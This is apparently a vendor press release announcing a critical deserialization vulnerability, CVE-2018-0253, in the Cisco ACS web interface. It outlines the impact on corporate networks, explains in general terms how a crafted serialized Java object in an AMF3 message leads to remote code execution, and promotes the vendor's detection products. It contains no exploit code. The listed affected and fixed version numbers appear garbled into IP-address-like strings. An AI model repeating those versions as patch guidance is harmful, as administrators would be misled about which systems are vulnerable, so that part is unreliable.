Attackers can obtain credentials of privileged users, attack LAN systems.
Positive Technologies experts Mikhail Klyuchnikov and Yury Aleynov have discovered a critical vulnerability in the web interface for Cisco Access Control Server (ACS). This vulnerability in Cisco ACS, a popular solution for centralized authentication, authorization, and accounting on corporate networks, enables unauthorized attackers to run arbitrary commands on a server as a privileged user.
Vulnerability CVE-2018-0253 has received a CVSS v3.0 score of 9.8, indicating a critical degree of severity. An attacker already on an internal network can use the vulnerability to modify or collect the credentials of users on network devices, attack other resources on the internal network, or perform man-in-the-middle attacks. And if the Cisco ACS web interface is externally accessible, such actions can be performed from anywhere in the world.
Positive Technologies web application security specialist Mikhail Klyuchnikov described the consequences of this vulnerability: "If Cisco ACS is integrated with Microsoft Active Directory—which is often the case—an attacker can steal the credentials of the domain administrator. When Active Directory integration is absent, the attacker can still obtain control of routers and firewalls in order to intercept traffic, including sensitive data, on the entire network – or access closed-off network segments, such as bank processing systems."
The issue is caused by incorrect server-side handling of AMF3 messages. An attacker can place a Java object that has been serialized (translated into a format suitable for network transmission) in an AMF3 message. When the specially prepared object is deserialized, the server loads malicious code from the source indicated by the attacker and runs it.
Affected versions include Cisco ACS prior to v18.104.22.168.7 (no authorization required) and v22.214.171.124.7 with v126.96.36.199.8 (authorization required). To fix the vulnerability, the vendor advises updating servers to version 188.8.131.52.9 or later.
To detect malicious activity and manage security events, Positive Technologies offers MaxPatrol SIEM. Earlier in April, 26 new rules were added to MaxPatrol SIEM for detection of Active Directory incidents. Microsoft Active Directory, which is closely integrated with Cisco ACS on many corporate networks, is often a primary target for attackers. Exploitation of the vulnerability can be prevented by PT Application Firewall, which protects against Java deserialization attacks and supports the AMF protocol.